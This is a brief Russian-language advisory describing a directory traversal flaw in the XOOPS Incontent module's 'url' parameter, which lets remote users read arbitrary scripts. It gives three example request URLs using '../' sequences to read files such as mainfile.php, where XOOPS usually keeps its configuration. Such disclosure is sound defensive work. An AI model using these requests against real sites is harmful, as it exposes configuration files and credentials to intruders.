Программа: XOOPS Incontent module

Уязвимость позволяет удаленному
пользователю просмотреть содержимое
произвольных сценариев на уязвимой системе.
Уязвимый модуль некорректно обрабатывает
параметр url. Удаленный пользователь может
просмотреть содержимое произвольных
сценариев на системе.

Пример:

http://[target]/modules/incontent/index.php? op=aff&optio n=0&url=../../../mainfile.php
http://[target]/modules/incontent/index.php? op=aff&option=0&url=../../.
./index.php
http://[target]/modules/incontent/index.php? op=aff&option=0&url=../../../header.php

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии